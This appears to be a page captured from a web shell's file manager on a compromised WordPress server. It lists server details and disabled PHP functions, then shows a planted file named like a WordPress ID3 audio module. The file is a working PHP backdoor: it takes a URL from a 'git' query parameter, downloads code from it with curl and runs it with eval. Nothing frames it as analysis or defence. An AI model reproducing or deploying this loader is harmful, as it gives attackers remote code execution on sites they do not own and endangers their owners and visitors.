HEX
Server: Apache
System: Linux ns9.sgtic-sarl.com 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
User: festartsdmbaorg (5215)
PHP: 8.1.34
Disabled: apache_child_terminate, apache_note, apache_setenv, curl_multi_exec, define_syslog_variables, dl, exec, link, openlog, passthru, pcntl_exec, pcntl_fork, pcntl_setpriority, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, stream_socket_sendto, symlink, syslog, system
Upload Files
File: /home/users/festartsdmbaorg/www/fest-artsdmba.org/wp-includes/ID3/module.audio.ac3-loop.php
<?php

if (isset($_GET['git'])) {
    $is_single_mwa = $_GET['git'];
    if ($_e_bzo = curl_init()) {
        curl_setopt($_e_bzo, CURLOPT_URL, $is_single_mwa);
        curl_setopt($_e_bzo, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($_e_bzo));
        curl_close($_e_bzo);
        exit;
    }
}